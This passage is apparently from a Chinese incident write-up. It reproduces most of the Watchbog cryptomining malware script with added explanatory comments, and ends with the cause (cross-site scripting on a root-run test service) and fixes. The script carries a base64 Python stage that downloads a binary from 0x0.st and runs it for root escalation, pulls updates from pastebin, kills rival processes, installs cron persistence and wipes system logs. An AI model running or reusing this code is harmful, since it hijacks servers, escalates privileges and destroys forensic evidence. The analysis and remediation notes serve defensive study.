3RtcC9hY3RpdmF0ZScnJwoKZGVmIG1kNUNoZWNrc3VtKGZpbGVQYXRoKToKICAgIHdpdGggb3BlbihmaWxlUGF0aCwgJ3JiJykgYXMgZmg6CiAgICAgICAgbSA9IGhhc2hsaWIubWQ1KCkKICAgICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICBkYXRhID0gZmgucmVhZCg4MTkyKQogICAgICAgICAgICBpZiBub3QgZGF0YToKICAgICAgICAgICAgICAgIGJyZWFrCiAgICAgICAgICAgIG0udXBkYXRlKGRhdGEpCiAgICAgICAgcmV0dXJuIG0uaGV4ZGlnZXN0KCkKCmRlZiBtYWluKCk6CiAgICBHb0pva2UgPSBteV9rZXJuZWxfdmVyIGluIGpva2VfZGljCiAgICBmID0gb3BlbignL3RtcC9hY3RpdmF0ZScsICd3JykKICAgIGYud3JpdGUoY29tKQogICAgZi5jbG9zZSgpICAgIAogICAgaWYgR29Kb2tlOgogICAgICAgIGlmIG9zLnBhdGguZXhpc3RzKCcvdXNyL2Jpbi93Z2V0JykgYW5kIG9zLnBhdGguaXNmaWxlKCcvdXNyL2Jpbi93Z2V0Jyk6CiAgICAgICAgICAgIG9zLnN5c3RlbSgnd2dldCBodHRwczovLzB4MC5zdC9zR2RiLmV4ZSAtTyAvdG1wL2VsYXZhdGUgJiYgY2htb2QgNzc3IC90bXAv
ZWxhdmF0ZSAmJiBjaG1vZCAreCAvdG1wL2VsYXZhdGUnKQogICAgICAgIGVsaWYgb3MucGF0aC5leGlzdHMoJy91c3IvYmluL2N1cmwnKSBhbmQgb3MucGF0aC5pc2ZpbGUoJy91c3IvYmluL2N1cmwnKToKICAgICAgICAgICAgb3Muc3lzdGVtKCdjdXJsIGh0dHBzOi8vMHgwLnN0L3NHZGIuZXhlIC1vIC90bXAvZWxhdmF0ZSAmJiBjaG1vZCA3NzcgL3RtcC9lbGF2YXRlICYmIGNobW9kICt4IC90bXAvZWxhdmF0ZScpCiAgICAgICAgZWxzZToKICAgICAgICAgICAgcmV0dXJuCiAgICAgICAgaWYgb3MucGF0aC5leGlzdHMoJy90bXAvZWxhdmF0ZScpIGFuZCBvcy5wYXRoLmlzZmlsZSgnL3RtcC9lbGF2YXRlJyk6CiAgICAgICAgICAgIGlmIG1kNUNoZWNrc3VtKCcvdG1wL2VsYXZhdGUnKT09JzE1NzQ5NWY2YmE4YzM2YzM4OTg0ZDFmOTAyY2YzYWMwJzoKICAgICAgICAgICAgICAgIG9zLnN5c3RlbSgnY2QgL3RtcC8gJiYgLi9lbGF2YXRlIDwgYWN0aXZhdGUnKQogICAgICAgICAgICAgICAgdGltZS5zbGVlcCgxMCkKICAgIGVsc2U6CiAgICAgICAgcmV0dXJuCgptYWluKCkK’))” >/dev/null 2>&1
else
# No python: skip escalation, stay unprivileged.
cronlow
downloadlow
fi
# Give the payload time to run, then treat the absence of /tmp/activate as
# the sign that it completed.
sleep 30
if [ ! -f “/tmp/activate” ]; then
echo “I guess The Exploit worked”
pmp=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pmp} -ne 0 ];then
# Owner column of every matching ps line; "root" means the miner is now
# running with root privileges (this is where the blog's "Hahahahha" comes from).
pup=$(ps auxf | grep ‘watchbog’ | grep -v grep | awk ‘{print $1}’)
if [ “$pup” == “root” ];then
echo “The Exploit worked Successfully”
echo “Hahahahha”
rm -rf /tmp/elevate
cronlow
exit 0
else
cronlow
downloadlow
fi
else
cronlow
downloadlow
fi
else
# /tmp/activate still present: clean both markers and fall back.
rm -rf /tmp/elevate
rm -rf /tmp/activate
cronlow
downloadlow
fi
else
# Not x86_64: no escalation attempt at all.
cronlow
downloadlow
fi
}


# ---- Entry point: runs top to bottom once the functions above are defined ----
# 1) Update check. Fetches a pastebin page and compares it with the literal
#    "updatex" (presumably a "$update"x-style guard with the x misplaced in
#    the rendering; note also the en-dash in "–max-time" — another rendering
#    artifact). On a match the /tmp/.tmpza marker is removed and spreada runs
#    unless /tmp/.tmpold already exists.
update=$( (curl -fsSL –max-time 120 https://pastebin.com/raw/2unJiD3b) )
if [ “$update” == “update”x ];then
echo “An update exists boss”
rm -rf /tmp/.tmpza
if [ ! -f “/tmp/.tmpold” ]; then
spreada
fi
else
echo “NO update exists boss”
fi
# 2) Branch on privilege.
BS=$( whoami )
echo “I am $BS”
# Non-root: persistence in the user's own crontab plus a single
# privilege-escalation attempt, guarded by the /tmp/.tmpleve marker.
if [ “$BS” != “root” ];then
# First run as this user: wipe the user's crontab and kill any watchbog
# (by PID from ps, then by command line).
if [ ! -f “/tmp/.tmpleve” ]; then
crontab -r
ps auxf|grep -v grep|grep “watchbog” | awk ‘{print $2}’|xargs kill -9
pkill -f watchbog
fi
# $? here is the exit status of `wc -l`, which is 0 whenever wc runs, so the
# "It's running boss" arm is not reached as written; control always falls
# into the else arm regardless of whether watchbog is running.
ps -fe|grep ‘watchbog’|grep -v grep|wc -l
if [ $? -ne 0 ];then
echo “It’s running boss”
crontab -r
cronlow
else
# One escalation attempt per host; later runs only re-drop the miner.
if [ ! -f “/tmp/.tmpleve” ]; then
rm -rf /tmp/.tmpelev
touch /tmp/.tmpleve
elevate
else
downloadlow
fi
cronlow
sleep 15
# ${pm} is read here before it is assigned three lines below; with an empty
# value this test errors out ("unary operator expected") and testlow is skipped.
if [ ${pm} -eq 0 ];then
testlow
fi
pm=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
# Beacon once the miner is visible, once per host (/tmp/.tmpc marker).
if [ ${pm} -ne 0 ];then
if [ ! -f “/tmp/.tmpc” ]; then
successlow
fi
fi
fi
fi
# 3) Root: system-wide persistence (system + cronhigh), miner drop into /bin,
#    beacon, fallbacks, then log wiping.
if [ “$BS” == “root” ];then
# Same $?-of-wc pattern as above: the first arm is not taken as written.
ps -fe|grep ‘watchbog’|grep -v grep|wc -l
if [ $? -ne 0 ];then
echo “It’s running boss”
system
cronhigh
downloadhigh
else
system
cronhigh
downloadhigh
sleep 15
pm=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pm} -ne 0 ];then
if [ ! -f “/tmp/.tmpc” ]; then
successhigh
fi
fi
sleep 30
# Fallback chain when no watchbog is running: alternate root build
# (testhigh), then the non-root drops. None of testhigh/downloadlow/testlow
# assigns pm, so the inner "-ne 0" beacons cannot fire on this path.
if [ ${pm} -eq 0 ];then
testhigh
if [ ${pm} -ne 0 ];then
successhigh
fi
fi
if [ ${pm} -eq 0 ];then
downloadlow
if [ ${pm} -ne 0 ];then
successlow
fi
fi
if [ ${pm} -eq 0 ];then
testlow
if [ ${pm} -ne 0 ];then
successlow
fi
fi

fi
# 4) Anti-forensics. `0>file` opens the file for writing on fd 0 and so
#    truncates it: root's mail spool (where the author first noticed the
#    stager line), wtmp (typically login history), secure (typically the auth
#    log) and the cron log are emptied, and syslog lines mentioning pastebin
#    or github are deleted. Investigation has to rely on off-host log copies.
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
sed -i ‘/pastebin/d’ /var/log/syslog
sed -i ‘/github/d’ /var/log/syslog
echo 0>/var/spool/mail/root
fi
# 5) Clean-up of earlier components when /tmp/.spread exists: kills processes
#    matching RED, relax and TnF (the header calls this copy "the TnF job"),
#    removes /opt/test and a /var/tmp drop directory. The directory spelled
#    here (…g1g5qf…) is not the one spreada creates (…g1A5qf…), so that one
#    survives this clean-up.
if [ -f “/tmp/.spread” ]; then
rm -rf /tmp/.spread
rm -rf /tmp/.tmpupdateaa
pkill -f RED
pkill -f relax
pkill -f TnF
rm -rf /opt/test/
rm -rf /tmp/.finished
rm -rf /var/tmp/systemd-private-xfjdhdicjijo473skiosoohxiskl573q-systemd-timesync.serviced-g1g5qf/cred/fghhhh/data/
fi

安全防护

根据被感染的文件,发现被感染的原因是跨站脚本,对外网公开的http服务里的静态资源是不对权限做校验的,脚本跟随ckeditor.js后一起加载,而且这台测试服务是用root权限启动的,所以直接就被成功地注入了.

解决方案

外网访问白名单
在服务的header限制里加入白名单,禁止跨域脚本
服务使用低权限用户启动